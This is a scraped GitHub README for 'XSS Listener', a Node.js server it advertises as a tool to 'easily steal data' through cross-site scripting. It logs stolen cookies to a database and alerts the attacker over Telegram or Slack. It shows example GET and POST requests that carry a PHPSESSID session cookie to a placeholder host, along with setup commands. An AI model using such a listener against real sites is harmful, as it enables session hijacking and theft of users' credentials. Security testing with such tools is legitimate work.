🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.

From now on, you do not need XSS listeners! XSS listener records the data you have stolen on the remote site in the database, and gives instant notification with telegram / slack.

🕸️ Know-How Background

What is XSS
Steal cookie with XSS without redirecting to another page
TR | How to use XSS

🕸️ Listener Usage

Listener accepts all HTTP methods with parameters, then save database. Example:

GET https://yourapp.com/?cookie=PHPSESSID=889c6594db2541db1666cefca7537373

or

POST https://yourapp.com/
Form: { cookie:'PHPSESSID=889c6594db2541db1666cefca7537373' }

You will notify by telegram bot.

🕸️ Detailed Usage

🕸️ List previous requests

https://yourapp.com/list

🕸️ Delete previous request by id

https://yourapp.com/delete/[id]

🕸️ Even you can use telegram (and / or Slack!)

/list

/delete [id]

🕸️ Run local environment

In terminal,

git clone https://github.com/cagataycali/xss-listener.git; # Clone
cd xss-listener; # Change directory.
npm install; # Install dependencies.
cp .env.example .env
# Fill in .env with required values.
# Fill bot token and user id.
node index.js

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

readme.md

readme.md

🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.

🕸️ Know-How Background

🕸️ Listener Usage

You will notify by telegram bot.

🕸️ Detailed Usage

🕸️ List previous requests

🕸️ Delete previous request by id

🕸️ Even you can use telegram (and / or Slack!)

🕸️ Run local environment

License

Files

readme.md

Latest commit

History

readme.md

File metadata and controls

🕷️ XSS Listener is a penetration tool for easy to steal data with various XSS.

🕸️ Know-How Background

🕸️ Listener Usage

You will notify by telegram bot.

🕸️ Detailed Usage

🕸️ List previous requests

🕸️ Delete previous request by id

🕸️ Even you can use telegram (and / or Slack!)

🕸️ Run local environment

License